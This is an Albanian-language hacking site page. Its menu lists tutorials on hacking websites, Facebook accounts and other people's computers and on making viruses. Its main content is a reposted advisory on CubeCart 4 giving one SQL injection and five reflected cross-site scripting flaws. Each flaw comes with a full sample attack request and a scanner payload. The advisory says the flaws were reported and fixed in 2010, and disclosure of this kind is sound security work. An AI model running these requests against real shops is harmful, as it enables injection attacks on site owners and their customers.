Hyrja
  IP VJEHDESI
  Qe ni menyr me hi ne pc te dikujjt tjeter(viktimes)
  qe ni menyr e thjesht si me hacku ni web
  Si ti mbyllim dritaret qe i kemi qel permes komanadve (tastatures)
  Miniimzimi i nje dritareet hapur
  Porgrami si me pas rrjrt lidhun me kabllni e ent ose pa pas rrjet
  Fito edhe ti 650 dollar ne muaj??
  Disa sektere te googles
  Nderro ip-i taper 20 sekonda
  Tefisho" shpejtësine e DOWNLOADIT
  Si ta hapim nje radio
  Si ta mbyllim E-Mailin ne hotmail.com
  Gjerat qe nevoiten per me hacku ni web
  gjerat qe duhet mi pas
  krijo nje virus te frikshem
  hacko nje webb
  fito pare duel ekn pc-në dhezz
  me sulmu web
  hin ne net te dikujt tjeter
  edh nje menyr me thy passa
  shkarko nga youtube
  blloko msn me nik name
  shpejto programa ne proces
  ndrro pasin administratorit
  pershpejto kempjuterin
  Ja pra ktu nje tutose si me hack web
  hacko webchat
  hacko nje forum qe esht phb
  Hackohet faqja e facebook-ut
  SQL Injection and XSS
  Linux Local Root Exploit
  Jax Guestbook admin
  My First Exploit
  Display event CMS SQL
  Adobe Flash and Reader
  DotNetNuke Remote File
  phpbb2.0.21
  Inout Adserver (id)
  SQL Injection and XSS
1.SQL injection in “/cubecart_4/index.php”, parameter “searchStr”.
2.Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.
3.Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “cartId”.
4.Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “email”.
5.Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transId”.
6.Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transStatus”.

1. SQL injection in “/cubecart_4/index.php”, parameter “searchStr”.

Additional details:

SQL query:

Kodi:
1 Error    message:

2 SQL: 

3 SELECT id FROM cube_CubeCart_search WHERE searchstr='''

Sample HTTP Request:
Kodi:
GET /cubecart_4/index.php?_a=viewCat&searchStr='&Submit=Go HTTP/1.1 

2 Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c 

3 Acunetix-Aspect: enabled 

4 Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294 

5 Host: webapps7:80 

6 Connection: Keep-alive 

7 Accept-Encoding: gzip,deflate 

8 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)


2. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.

Attack details

URL encoded GET input amount was set to ” onmouseover=prompt(949088) bad=”
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

Kodi:
GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=%22%20onmouseover%3dprompt%28949088%29%20bad%3d%22&cartId=&email=&transId=&transStatus= HTTP/1.1 

2 Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294 

3 Host: webapps7:80 

4 Connection: Keep-alive 

5 Accept-Encoding: gzip,deflate 

6 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

3. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “cartId”.

Attack details

URL encoded GET input cartId was set to ” onmouseover=prompt(932890) bad=”
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

Kodi:
GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=%22%20onmouseover%3dprompt%28934178%29%20bad%3d%22&email=&transId=&transStatus= HTTP/1.1 

2 Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294 

3 Host: webapps7:80 

4 Connection: Keep-alive 

5 Accept-Encoding: gzip,deflate 

6 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 

4. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “email”.

Attack details

URL encoded GET input email was set to ” onmouseover=prompt(908306) bad=”
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

Kodi:
GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=%22%20onmouseover%3dprompt%28908306%29%20bad%3d%22&transId=&transStatus= HTTP/1.1 

2 Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294 

3 Host: webapps7:80 

4 Connection: Keep-alive 

5 Accept-Encoding: gzip,deflate 

6 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)


5. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transId”.

Attack details

URL encoded GET input transId was set to ” onmouseover=prompt(998313) bad=”
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

Kodi:
GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&transId=%22%20onmouseover%3dprompt%28998313%29%20bad%3d%22&transStatus= HTTP/1.1 

2 Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294 

3 Host: webapps7:80 

4 Connection: Keep-alive 

5 Accept-Encoding: gzip,deflate 

6 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)


6. Cross-site Scripting vulnerability in “/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transStatus”.

Attack details

URL encoded GET input transStatus was set to ” onmouseover=prompt(923101) bad=”
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:
Kodi:
GET /cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&transId=&transStatus=%22%20onmouseover%3dprompt%28923101%29%20bad%3d%22 HTTP/1.1 

2 Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294; ccUser=7c970bfe00c50261d25166dbab43c294 

3 Host: webapps7:80 

4 Connection: Keep-alive 

5 Accept-Encoding: gzip,deflate 

6 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)


These vulnerabilities were reported to the CubeCart team on 22/7/2010 via the support system on their website and they were fixed in latest version of CubeCart . If you are using CubeCart, download the latest version from their website
 
 
This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free